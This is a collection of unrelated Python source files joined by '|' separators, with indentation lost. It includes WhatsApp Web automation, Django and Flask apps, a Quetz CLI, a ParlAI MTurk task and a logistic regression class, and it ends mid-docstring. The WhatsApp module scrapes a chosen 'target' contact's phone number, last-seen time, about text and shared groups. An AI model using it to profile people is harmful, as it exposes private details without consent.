#region LOGGER create
logger : Logger = Logger.setup_logger('logs',logs_path/'logs.log')
#endregion
# region SEARCH AND SELECT TARGET
async def __type_in_chat_or_message_search(page,target):
try:
print(f'Looking for: {target}')
await page.waitForSelector(
whatsapp_selectors_dict['chat_or_message_search'],
visible=True,
timeout=0
)
await page.waitFor(500)
await page.type(whatsapp_selectors_dict['chat_or_message_search'], target)
await page.waitFor(3000)
except Exception as e:
print(e)
async def __get_chats_messages_groups_elements(page):
chats_messages_groups_elements_list = [] # type : list[int]
try:
chats_messages_groups_elements_list = await page.querySelectorAll\
(whatsapp_selectors_dict['chats_groups_messages_elements'])
return chats_messages_groups_elements_list
except Exception as e:
print(e)
exit()
async def __get_contacts_matched_with_query(chats_groups_messages_elements_list):
contacts_to_choose_from = [] # type : list[str , int]
get_contact_node_title_function = 'node => node.parentNode.getAttribute("title")'
for idx, element in enumerate(chats_groups_messages_elements_list):
try:
contact_name = await element.querySelectorEval(whatsapp_selectors_dict['contact_element'],get_contact_node_title_function)
contacts_to_choose_from.append((contact_name,idx))
except ElementHandleError:
# if it is not a contact element, move to the next one
continue
except Exception as e:
print(e)
return contacts_to_choose_from
async def __get_groups_matched_with_query(chats_groups_messages_elements_list,hide_groups):
groups_to_choose_from = []
if hide_groups:
return groups_to_choose_from
get_group_node_title_function = 'node => node.parentNode.getAttribute("title")'
for idx, element in enumerate(chats_groups_messages_elements_list):
try:
group_name = await element.querySelectorEval(whatsapp_selectors_dict['group_element'],
get_group_node_title_function)
groups_to_choose_from.append((group_name,idx))
except ElementHandleError:
# if it is not a contact element, move to the next one
continue
except Exception as e:
print(e)
return groups_to_choose_from
async def __open_selected_chat(target_index,chats_messages_groups_elements_list):
try:
await chats_messages_groups_elements_list[target_index].click()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
exit()
async def get_complete_info_on_target(page):
contact_page_elements = []
try:
await page.waitForSelector(
whatsapp_selectors_dict['target_chat_header'],
visible=True,
timeout=3000
)
await page.click(whatsapp_selectors_dict['target_chat_header'])
contact_page_elements = await get_contact_page_elements(page)
complete_target_info = {}
await get_contact_name_info(contact_page_elements[0], complete_target_info)
await get_contact_about_and_phone(contact_page_elements[3], complete_target_info)
await get_contact_groups_common_with_target(complete_target_info, page)
except Exception as e:
print(e)
return complete_target_info
async def get_contact_page_elements(page):
contact_page_elements = []
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_elements'],
visible=True,
timeout=8000
)
contact_page_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_elements'])
except Exception as e:
print(e)
return contact_page_elements
async def get_contact_name_info(contact_name_element,complete_target_info):
try:
complete_target_info['Name'] = await contact_name_element.querySelectorEval('span > span', 'element => element.innerText')
complete_target_info['Last_seen'] = await contact_name_element.querySelectorEval('div > span:last-of-type > div > span', 'element => element.getAttribute("title")')
except:
print(f'last seen not available')
async def get_contact_about_and_phone(contact_name_element, complete_target_info):
try:
complete_target_info['About'] = await contact_name_element.querySelectorEval('div:nth-child(2) > div > div > span > span', 'element => element.getAttribute("title")')
complete_target_info['Mobile'] = await contact_name_element.querySelectorEval('div:last-of-type > div > div > span > span', 'element => element.innerText')
except Exception as e:
print(e)
async def get_contact_groups_common_with_target(complete_target_info,page):
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_group_element_heading'],
visible= True,
timeout=3000
)
if (await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["contact_info_page_group_element_heading"]}").innerText'))\
== "Groups in common":
group_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_group_elements'])
complete_target_info['Groups'] = [await ele.querySelectorEval('div>div>div:nth-child(2)>div:first-child>div>div>span', 'e => e.getAttribute("title")') for ele in group_elements]
else:
complete_target_info['Groups'] = []
except:
complete_target_info['Groups'] = []
print(f'No groups in common')
async def close_contact_info_page(page):
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_close_button'],
visible = True,
timeout = 5000
)
await page.click(whatsapp_selectors_dict['contact_info_page_close_button'])
except Exception as e:
print(e)
def print_complete_target_info(complete_target_info):
for key in complete_target_info.keys():
if key == "Groups":
print("Groups:")
print(*complete_target_info[key], sep=",")
else:
print(f'{key}: {complete_target_info[key]} ')
async def __open_new_chat(page):
await page.waitForSelector(
whatsapp_selectors_dict['new_chat_button'],
visible=True,
timeout=0
)
await page.waitFor(500)
await page.click(whatsapp_selectors_dict['new_chat_button'])
async def __type_in_new_chat_search_bar(page, target):
print(f'Looking for: {target}')
logger.info('Searching Target')
await page.waitForSelector(
whatsapp_selectors_dict['search_contact_input_new_chat'],
visible=True
)
await page.type(whatsapp_selectors_dict['search_contact_input_new_chat'], target)
await page.waitFor(3000)
async def __get_contacts_elements_filtered(page, target):
contact_list_elements_unchecked = list()
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_list_elements_filtered_new_chat'],
visible=True,
timeout=3000
)
contact_list_elements_unchecked = await page.querySelectorAll(
whatsapp_selectors_dict['contact_list_elements_filtered_new_chat']
)
except:
print(f'No contact named by "{target}"!')
logger.info('Target not found')
return contact_list_elements_unchecked
async def __get_groups_elements_filtered(page, target, hide_groups=False):
group_list_elements_unchecked = list()
if hide_groups:
return group_list_elements_unchecked
try:
await page.waitForSelector(
whatsapp_selectors_dict['group_list_elements_filtered_new_chat'],
visible=True,
timeout=3000
)
group_list_elements_unchecked = await page.querySelectorAll(
whatsapp_selectors_dict['group_list_elements_filtered_new_chat']
)
except:
print(f'No group named by "{target}"!')
logger.info('Target not found in groups')
return group_list_elements_unchecked
async def __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked):
contact_titles_unchecked = []
for i in range(len(contact_list_elements_unchecked)):
contact_titles_unchecked\
.append(await page.evaluate(f'document.querySelectorAll("{whatsapp_selectors_dict["contact_list_elements_filtered_new_chat"]}")[{i}].getAttribute("title")'))
return contact_titles_unchecked
async def __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked):
group_titles_unchecked = []
for i in range(len(group_list_elements_unchecked)):
group_titles_unchecked.append(await page.evaluate(f'document.querySelectorAll("{whatsapp_selectors_dict["group_list_elements_filtered_new_chat"]}")[{i}].getAttribute("title")'))
return group_titles_unchecked
# contact_list_unchecked is a zip (list of tuples) of contact_titles and
# contact elements, unchecked.
def __zip_contact_titles_and_elements_unchecked(contact_titles_unchecked, contact_list_elements_unchecked):
contact_list_unchecked = list(zip(contact_titles_unchecked, contact_list_elements_unchecked))
return contact_list_unchecked
def __zip_group_titles_and_elements_unchecked(group_titles_unchecked, group_list_elements_unchecked):
group_list_unchecked = list(zip(group_titles_unchecked, group_list_elements_unchecked))
return group_list_unchecked
# __checking_contact_list verify if target is in title, if not we pop from list
def __check_contact_list(target, contact_list_unchecked):
i = 0
while i < len(contact_list_unchecked):
if len(contact_list_unchecked) <= 0:
break
# we can add more verifications if we are getting false-positive contacts
if contact_list_unchecked[i][0].lower().find(target.lower()) == -1:
try:
contact_list_unchecked.pop(i)
except Exception as e:
print(f'Error: {str(e)}')
i -= 1
i += 1
contact_tuple = tuple(contact_list_unchecked)
return contact_tuple
def __check_group_list(target, group_list_unchecked):
i = 0
while i < len(group_list_unchecked):
if len(group_list_unchecked) <= 0:
break
# we can add more verifications if we are getting false-positive groups
if group_list_unchecked[i][0].lower().find(target.lower()) == -1:
try:
group_list_unchecked.pop(i)
except Exception as e:
print(f'Error: {str(e)}')
i -= 1
i += 1
group_tuple = tuple(group_list_unchecked)
return group_tuple
# target_list is like that: (((0, 'a'), (1, 'b')), ((3, 'c'), (4, 'd'))),
# but instead numbers and letters we have titles and elements
# the first index is the contacts and the second is the groups
def __get_target_tuple(contact_tuple, group_tuple):
target_tuple = (contact_tuple, group_tuple)
return target_tuple
def __print_target_tuple(target_tuple):
lenght_of_contacts_tuple = len(target_tuple[0])
lenght_of_groups_tuple = len(target_tuple[1])
for i in range(lenght_of_contacts_tuple):
if lenght_of_contacts_tuple <= 0:
break
if i == 0:
print("Contacts found:")
logger.info('List of Targets')
print(f'{i}: {target_tuple[0][i][0]}')
for i in range(lenght_of_contacts_tuple, lenght_of_groups_tuple + lenght_of_contacts_tuple):
if lenght_of_groups_tuple <= 0:
break
if i == lenght_of_contacts_tuple:
print("Groups found:")
logger.info('List of Target in groups')
print(f'{i}: {target_tuple[1][i-lenght_of_contacts_tuple][0]}')
def __ask_user_to_choose_the_filtered_target(target_tuple):
if len(target_tuple[0] + target_tuple[1]) > 0:
logger.info('Input Target Number')
target_index_choosed = int(
input('Enter the number of the target you wish to choose: '))
return target_index_choosed
def __get_choosed_target(target_tuple, target_index_choosed):
lenght_of_contacts_tuple = len(target_tuple[0])
if target_index_choosed is None:
exit()
try:
if target_index_choosed < lenght_of_contacts_tuple:
choosed_target = target_tuple[0][target_index_choosed]
elif target_index_choosed >= lenght_of_contacts_tuple:
choosed_target = target_tuple[1][target_index_choosed - lenght_of_contacts_tuple]
else:
print("This target doesn't exist!")
logger.error('Invalid Target')
exit()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
logger.error('Invalid Target')
exit()
return choosed_target
async def __navigate_to_target(page, choosed_target):
try:
await choosed_target[1].click()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
logger.error('Invalid Target')
exit()
async def __get_focused_target_title(page, target):
try:
await page.waitForSelector(whatsapp_selectors_dict['target_focused_title'])
target_focused_title = await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["target_focused_title"]}").getAttribute("title")')
except Exception as e:
print(f'No target selected! Error: {str(e)}')
logger.error('Target not selected from list')
exit()
return target_focused_title
def __print_selected_target_title(target_focused_title):
print(f"You've selected the target named by: {target_focused_title}")
logger.info('Selected Target')
def __check_target_focused_title(page, target, target_focused_title):
if target_focused_title.lower().find(target.lower()) == -1:
print(f"You're focused in the wrong target, {target_focused_title}")
must_continue = str(input("Do you want to continue (yes/no)? "))
accepted_yes = {'yes', 'y'}
if must_continue.lower() in accepted_yes:
pass
else:
exit()
async def __wait_for_message_area(page):
try:
await page.waitForSelector(whatsapp_selectors_dict['message_area'])
except Exception as e:
print(f"You don't belong this group anymore! Error: {str(e)}")
# endregion
|
def beg(arr):
a = []
b = []
c = []
for i in arr:
if i == 0:
a.append(i)
if i == 1:
b.append(i)
if i == 2:
c.append(i)
return a+b+c
a = []
b = [0,0,0]
c = [1,2,1,1,2,1,2]
d = [0,2,1,0,1,0,2,2,2,1,0,2,1,0,1,2,0]
print(beg(a))
print(beg(b))
print(beg(c))
print(beg(d))
|
from django.apps import AppConfig
class MasterAppConfig(AppConfig):
name = 'msa.contrib.master'
verbose_name = 'Master Service'
|
import importlib
import json
import os
import shutil
import subprocess
from pathlib import Path
from shutil import which
from typing import List, Optional, Tuple
from setuptools import find_packages
from typer import Argument, Option, Typer
from .paths import (
GLOBAL_APP_DIR,
GLOBAL_EXTENSIONS_DIR,
GLOBAL_FRONTEND_DIR,
GLOBAL_QUETZ_DIR,
LOCAL_APP_DIR,
)
from .utils import clean_dir, get_extensions_dir, get_federated_extensions
app = Typer()
@app.command()
def link_frontend(
dev_mode: bool = Option(
False, "--development", help="Whether to install it in dev mode or not"
)
) -> None:
"""Intall the Quetz-Frontend"""
assert LOCAL_APP_DIR.exists()
if not GLOBAL_FRONTEND_DIR.exists():
GLOBAL_FRONTEND_DIR.mkdir(parents=True, exist_ok=True)
if GLOBAL_APP_DIR.exists():
if GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
else:
shutil.rmtree(GLOBAL_APP_DIR)
if dev_mode:
GLOBAL_APP_DIR.symlink_to(LOCAL_APP_DIR)
print(
f"""Symlink created:
Ori: {LOCAL_APP_DIR}
Dest: {GLOBAL_APP_DIR}
"""
)
else:
shutil.copytree(LOCAL_APP_DIR, GLOBAL_APP_DIR, symlinks=True)
print(
f"""App directory copied:
Ori: {LOCAL_APP_DIR}
Dest: {GLOBAL_APP_DIR}
"""
)
@app.command()
def clean_frontend() -> None:
"""Clean the Quetz-Frontend"""
if GLOBAL_APP_DIR.is_file() or GLOBAL_APP_DIR.is_symlink():
GLOBAL_APP_DIR.unlink()
elif GLOBAL_APP_DIR.is_dir():
shutil.rmtree(GLOBAL_APP_DIR)
@app.command()
def install(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Build and install an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(ext_path, True, False)
module, metadata = _get_extensions_metadata(extension_path)
src = Path(extension_path).joinpath(module.__name__, metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(metadata[0]["dest"])
clean_dir(dest)
shutil.copytree(src, dest, symlinks=True)
print(
f"""
Extension installed:
Path: {dest}
"""
)
@app.command()
def develop(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Build and install an extension in dev mode"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, True, False)
_develop_extension(extension_path)
@app.command()
def build(
ext_path: str = Argument(Path(), help="The path of the extension"),
dev_mode: bool = Option(False, "--development", help="Build in development"),
) -> None:
"""Build an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_build_extension(extension_path, dev_mode, False)
@app.command()
def watch(ext_path: str = Argument(Path(), help="The path of the extension")) -> None:
"""Watch an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(ext_path).resolve()
assert extension_path.joinpath("package.json").exists()
_develop_extension(extension_path)
_build_extension(extension_path, True, True)
@app.command()
def uninstall(ext_name: str = Argument("", help="The name of the extension")) -> None:
"""Uninstall an extension"""
if not GLOBAL_EXTENSIONS_DIR.exists():
os.mkdir(GLOBAL_EXTENSIONS_DIR)
extension_path = Path(GLOBAL_EXTENSIONS_DIR, ext_name)
clean_dir(extension_path)
@app.command()
def list() -> None:
"""List of extensions"""
print(f"Installed extensions:")
print(f"---------------------")
print(f" Installation path: '{GLOBAL_EXTENSIONS_DIR}'\n")
extensions = get_federated_extensions([get_extensions_dir()])
if not extensions:
print("No installed extensions yet")
for ext in extensions.values():
print(f'\t- {Path(ext["ext_path"]).relative_to(GLOBAL_EXTENSIONS_DIR)}')
print()
@app.command()
def clean() -> None:
"""Clean the extensions directory"""
if GLOBAL_EXTENSIONS_DIR.exists():
shutil.rmtree(GLOBAL_EXTENSIONS_DIR)
@app.command()
def paths() -> None:
"""Quetz installation paths"""
print(
f"""
System cofigured paths:
Quetz: {GLOBAL_QUETZ_DIR}
Frontend: {GLOBAL_FRONTEND_DIR}
App: {GLOBAL_APP_DIR}
Extensions: {GLOBAL_EXTENSIONS_DIR}
"""
)
def _develop_extension(ext_path: Path):
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
_, metadata = _get_extensions_metadata(ext_path)
src = ext_path / ext_data["quetz"].get("outputDir", metadata[0]["src"])
dest = GLOBAL_EXTENSIONS_DIR.joinpath(ext_data["name"])
clean_dir(dest)
# Create parent directory if extension name is scoped
dest.parent.mkdir(parents=True, exist_ok=True)
dest.symlink_to(src)
print(
f"""
Symlink created:
Ori: {src!s}
Dest: {dest!s}
"""
)
def _build_extension(ext_path: Path, dev_mode: bool = False, watch: bool = False):
if not GLOBAL_APP_DIR.joinpath("package.json").exists():
print(f"Quetz frontend not fount at '{GLOBAL_APP_DIR!s}'")
builder_path = _find_builder(ext_path)
if builder_path is None:
print(f"Could not find @quetz-frontend/builder at {ext_path!s}")
print(f"Extensions require a devDependency '@quetz-frontend/builder'")
return
exe = "node"
exe_path = which(exe)
if not exe_path:
print(f"Could not find {exe}. Install NodeJS.")
exit(1)
command = [exe, str(builder_path), "--core-path", str(GLOBAL_APP_DIR.resolve())]
if dev_mode:
command.append("--development")
command.append("--source-map")
if watch:
command.append("--watch")
command.append(str(ext_path))
print("Building extension")
subprocess.check_call(command)
def _find_builder(ext_path: Path) -> Optional[Path]:
"""Find the package '@quetz-frontend/builder' in the extension dependencies"""
with (ext_path / "package.json").open(encoding="utf-8") as fid:
ext_data = json.load(fid)
depVersion2 = ext_data.get("devDependencies", dict()).get("@quetz-frontend/builder")
depVersion2 = depVersion2 or ext_data.get("dependencies", dict()).get(
"@quetz-frontend/builder"
)
if depVersion2 is None:
return None
# Find @quetz-frontend/builder in the node_modules directory
target = ext_path
while not (target / "node_modules" / "@quetz-frontend" / "builder").exists():
if target.parent == target:
return None
target = target.parent
return (
target
/ "node_modules"
/ "@quetz-frontend"
/ "builder"
/ "lib"
/ "build-quetzextension.js"
)
def _get_extensions_metadata(
module_path: Path,
) -> Tuple["importlib.ModuleType", List[str]]:
mod_path = module_path.resolve()
if not mod_path.exists():
raise FileNotFoundError(f"The path `{mod_path!s}` does not exist.")
# TODO: Change function name to match lab
try:
module = importlib.import_module(str(module_path))
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
else:
module = None
except Exception:
module = None
# Looking for modules in the package
packages = find_packages(str(mod_path))
for package in packages:
try:
module = importlib.import_module(package)
if hasattr(module, "js_plugin_paths"):
return module, module.js_plugin_paths()
except Exception:
module = None
raise ModuleNotFoundError(f"There is not a extension at {module_path}")
if __name__ == "__main__":
app()
|
from socorepo.locators import github_tags, nexus3, pypi
LOCATOR_PARSERS = {
"github_tags": github_tags.parse_locator,
"nexus3": nexus3.parse_locator,
"pypi": pypi.parse_locator
}
|
from flask import Flask, render_template, request
import json
import requests
app = Flask(__name__)
@app.route('/')
def stop_words():
URL_prefix = 'https://api.github.com/search/code?q='
URL_suffix = '+repo:spotify/mkdocs-monorepo-plugin/docs'
reportfile = open('./templates/stopWordsSearch.html', 'w')
reportfile.write('<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/bootstrap.min.css">')
reportfile.write('<link rel="stylesheet" type="text/css" href="../static/common.css">')
reportfile.write('<script src="../static/jquery.min.js"></script>')
reportfile.write('<script src="../static/popper.min.js"></script>')
reportfile.write('<script src="../static/bootstrap.min.js"></script>')
reportfile.write('<title>Stop-words Search</title></head>')
reportfile.write('<body><div class="container"><h1>Stop-words Search</h1>')
fname = './static/wordList.txt'
wordlist = []
explainlist = []
print("\n")
print('Reading the word list ...\n')
fwordlist = open(fname, 'r')
for line in fwordlist:
colon = line.find(':')
word = line[0:(colon)]
explain = line[(colon + 1):]
explain = explain.rstrip()
print(word)
print(explain)
wordlist.append(word)
explainlist.append(explain)
fwordlist.close()
print(wordlist)
print(explainlist)
x = len(wordlist)
print('\nNo. of words and phrases to search for: ', x)
try:
reportfile.write('<p class="lead">Consider reviewing the occurrences of the following words in the documentation.</p><hr/>')
wordpos = 0
for word in wordlist:
url_string = URL_prefix + word + URL_suffix
r = requests.get(url_string)
json_data = json.loads(json.dumps(r.json()))
print(json_data)
if len(json_data['items']) != 0:
print(word)
reportfile.write('<div class="container">')
reportfile.write('<h2>' + word + '</h2>')
print(explainlist[wordpos])
reportfile.write('<p>' + explainlist[wordpos] + '</p>')
print(json_data['total_count'], 'instances of', word)
reportfile.write('<p>' + str(json_data['total_count']) + ' instances of <mark>' + word + '</mark> found in the following files:</p>')
reportfile.write('<ul>')
for line in json_data['items']:
for k, v in line.items():
if k == 'path':
print(v)
reportfile.write('<li>' + v + '</li>')
print('--------\n')
reportfile.write('</ul>')
reportfile.write('</div>')
reportfile.write('<hr/>')
wordpos = wordpos + 1
except:
reportfile.write("<p class='text-danger'>>>>>> If you're seeing these lines, it means you've hit the API rate limits for GitHub search and the Stopwords search was abandoned.</p>")
#reportfile.write("<p class='text-danger'>Had the search been completed, you would've got an output shown in the following image.</p>")
#reportfile.write('<img src="../static/stopWords.png"/>')
reportfile.write("<p class='text-danger'>Maybe choose a smaller documentation repository for your search?</p>")
reportfile.write("<p class='text-danger'>But then, this is just a demo and you get the general idea, I hope? <<<<<")
reportfile.write("</div></body>")
reportfile.write("</html>")
reportfile.close()
return render_template('stopWordsSearch.html')
if __name__ == "__main__":
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
#app.run()
|
from django.apps import apps
from django.db import DEFAULT_DB_ALIAS, router
from django.db.models import signals
from django.utils.encoding import smart_text
from django.utils import six
from django.utils.six.moves import input
def update_contenttypes(app_config, verbosity=2, interactive=True, using=DEFAULT_DB_ALIAS, **kwargs):
"""
Creates content types for models in the given app, removing any model
entries that no longer have a matching model class.
"""
if not app_config.models_module:
return
try:
ContentType = apps.get_model('contenttypes', 'ContentType')
except LookupError:
return
if not router.allow_migrate(using, ContentType):
return
ContentType.objects.clear_cache()
app_label = app_config.label
app_models = dict(
(model._meta.model_name, model)
for model in app_config.get_models())
if not app_models:
return
# Get all the content types
content_types = dict(
(ct.model, ct)
for ct in ContentType.objects.using(using).filter(app_label=app_label)
)
to_remove = [
ct
for (model_name, ct) in six.iteritems(content_types)
if model_name not in app_models
]
cts = [
ContentType(
name=smart_text(model._meta.verbose_name_raw),
app_label=app_label,
model=model_name,
)
for (model_name, model) in six.iteritems(app_models)
if model_name not in content_types
]
ContentType.objects.using(using).bulk_create(cts)
if verbosity >= 2:
for ct in cts:
print("Adding content type '%s | %s'" % (ct.app_label, ct.model))
# Confirm that the content type is stale before deletion.
if to_remove:
if interactive:
content_type_display = '\n'.join(
' %s | %s' % (ct.app_label, ct.model)
for ct in to_remove
)
ok_to_delete = input("""The following content types are stale and need to be deleted:
%s
Any objects related to these content types by a foreign key will also
be deleted. Are you sure you want to delete these content types?
If you're unsure, answer 'no'.
Type 'yes' to continue, or 'no' to cancel: """ % content_type_display)
else:
ok_to_delete = False
if ok_to_delete == 'yes':
for ct in to_remove:
if verbosity >= 2:
print("Deleting stale content type '%s | %s'" % (ct.app_label, ct.model))
ct.delete()
else:
if verbosity >= 2:
print("Stale content types remain.")
def update_all_contenttypes(**kwargs):
for app_config in apps.get_app_configs():
update_contenttypes(app_config, **kwargs)
signals.post_migrate.connect(update_contenttypes)
if __name__ == "__main__":
update_all_contenttypes()
|
#!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from parlai.core.params import ParlaiParser
from parlai.mturk.core.mturk_manager import MTurkManager
from worlds import \
PersonaChatWorld, PersonaProfileWorld, PersonasGenerator
from task_config import task_config
import os
def main():
"""This task consists of one agent, model or MTurk worker, talking to an
MTurk worker to negotiate a deal.
"""
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
argparser.add_argument('-min_t', '--min_turns', default=5, type=int,
help='minimum number of turns')
argparser.add_argument('-mt', '--max_turns', default=10, type=int,
help='maximal number of chat turns')
argparser.add_argument('-mx_rsp_time', '--max_resp_time', default=150,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('-mx_psn_time', '--max_persona_time', type=int,
default=300, help='time limit for turker'
'entering the persona')
argparser.add_argument('--ag_shutdown_time', default=120,
type=int,
help='time limit for entering a dialog message')
argparser.add_argument('--persona-type', default='both', type=str,
choices=['both', 'self', 'other'],
help='Which personas to load from personachat')
argparser.add_argument('--revised', default=False, type='bool',
help='Whether to use revised personas')
argparser.add_argument('-rt', '--range_turn', default='5,7',
help='sample range of number of turns')
argparser.add_argument('--personas-path', default=None,
help='specify path for personas data')
opt = argparser.parse_args()
directory_path = os.path.dirname(os.path.abspath(__file__))
opt['task'] = os.path.basename(directory_path)
if not opt.get('personas_path'):
opt['personas_path'] = argparser.parlai_home + '/parlai/mturk/personachat_chat/data'
opt.update(task_config)
opt['extract_personas_path'] = os.path.join(opt['datapath'], 'personachat_chat')
mturk_agent_ids = ['PERSON_1', 'PERSON_2']
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=mturk_agent_ids
)
persona_generator = PersonasGenerator(opt)
mturk_manager.setup_server(task_directory_path=directory_path)
try:
mturk_manager.start_new_run()
mturk_manager.create_hits()
if not opt['is_sandbox']:
blocked_worker_list = []
for w in blocked_worker_list:
mturk_manager.block_worker(w, 'We found that you have unexpected behaviors in our previous HITs. For more questions please email us.')
def run_onboard(worker):
worker.persona_generator = persona_generator
world = PersonaProfileWorld(opt, worker)
world.parley()
world.shutdown()
mturk_manager.set_onboard_function(onboard_function=run_onboard)
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for index, worker in enumerate(workers):
worker.id = mturk_agent_ids[index % len(mturk_agent_ids)]
def run_conversation(mturk_manager, opt, workers):
agents = [workers[0], workers[1]]
conv_idx = mturk_manager.conversation_index
world = PersonaChatWorld(
opt=opt,
agents=agents,
range_turn=[int(s) for s in opt['range_turn'].split(',')],
max_turn=opt['max_turns'],
max_resp_time=opt['max_resp_time'],
world_tag='conversation t_{}'.format(conv_idx)
)
world.reset_random()
while not world.episode_done():
world.parley()
world.save_data()
world.shutdown()
world.review_work()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except BaseException:
raise
finally:
mturk_manager.expire_all_unassigned_hits()
mturk_manager.shutdown()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Logistic Regression Gradient Descent
"""
import numpy as np
class LogisticRegressionGD(object):
"""Logistic Regression Classifier using gradient descent.
Parameters
------------
eta : float
Learning rate (between 0.0 and 1.0)
n_iter : int
Passes over the training dataset.
random_state : int
Random number generator seed for random weight
initialization.
Attributes
-----------
w_ : 1d-array
Weights after fitting.
cost_ : list
Logistic cost function value in each epoch.
"""
def __init__(self, eta=0.05, n_iter=100, random_state=1):
self.eta = eta
self.n_iter = n_iter
self.random_state = random_state
def fit(self, X, y):
""" Fit training data.
Parameters
----------
X : {array-like}, shape = [n_examples, n_features]
Training vectors, where n_examples is the number of
examples and n_features is the number of features.
y : array-like, shape = [n_examples]
Target values.
Returns
-------
self : object
"""
rgen = np.random.RandomState(self.random_state)
self.w_ = rgen.normal(loc=0.0, scale=0.01,
size=1 + X.shape[1])
self.cost_ = []
for i in range(self.n_iter):
net_input = self.net_input(X)
output = self.activation(net_input)
errors = (y - output)
self.w_[1:] += self.eta * X.T.dot(errors)
self.w_[0] += self.eta * errors.sum()
# note that we compute the logistic `cost` now
# instead of the sum of squared errors cost
cost = (-y.dot(np.log(output)) -
((1 - y).dot(np.log(1 - output))))
self.cost_.append(cost)
return self
def net_input(self, X):
"""Calculate net input"""
return np.dot(X, self.w_[1:]) + self.w_[0]
def activation(self, z):
"""Compute logistic sigmoid activation"""
return 1. / (1. + np.exp(-np.clip(z, -250, 250)))
def predict(self, X):
"""Return class label after unit step"""
return np.where(self.net_input(X) >= 0.0, 1, 0)
# equivalent to:
# return np.where(self.activation(self.net_input(X))
# >= 0.5, 1, 0)
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.providers.mysql.hooks.mysql`."""
import warnings
# pylint: disable=unused-import
from airflow.providers.mysql.hooks.mysql import MySqlHook # noqa
warnings.warn(
"This module is deprecated. Please use `airflow.providers.mysql.hooks.mysql`.",
DeprecationWarning, stacklevel=2
)
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tiling(_BaseTraceHierarchyType):
# flip
# ----
@property
def flip(self):
"""
Determines if the positions obtained from solver are flipped on
each axis.
The 'flip' property is a flaglist and may be specified
as a string containing:
- Any combination of ['x', 'y'] joined with '+' characters
(e.g. 'x+y')
Returns
-------
Any
"""
return self["flip"]
@flip.setter
def flip(self, val):
self["flip"] = val
# packing
# -------
@property
def packing(self):
"""
Determines d3 treemap solver. For more info please refer to
https://github.com/d3/d3-hierarchy#treemap-tiling
The 'packing' property is an enumeration that may be specified as:
- One of the following enumeration values:
['squarify', 'binary', 'dice', 'slice', 'slice-dice',
'dice-slice']
Returns
-------
Any
"""
return self["packing"]
@packing.setter
def packing(self, val):
self["packing"] = val
# pad
# ---
@property
def pad(self):
"""
Sets the inner padding (in px).
The 'pad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["pad"]
@pad.setter
def pad(self, val):
self["pad"] = val
# squarifyratio
# -------------
@property
def squarifyratio(self):
"""
When using "squarify" `packing` algorithm, according to https:/
/github.com/d3/d3-hierarchy/blob/master/README.md#squarify_rati
o this option specifies the desired aspect ratio of the
generated rectangles. The ratio must be specified as a number
greater than or equal to one. Note that the orientation of the
generated rectangles (tall or wide) is not implied by the
ratio; for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is either 2:1 or
1:2. When using "squarify", unlike d3 which uses the Golden
Ratio i.e. 1.618034, Plotly applies 1 to increase squares in
treemap layouts.
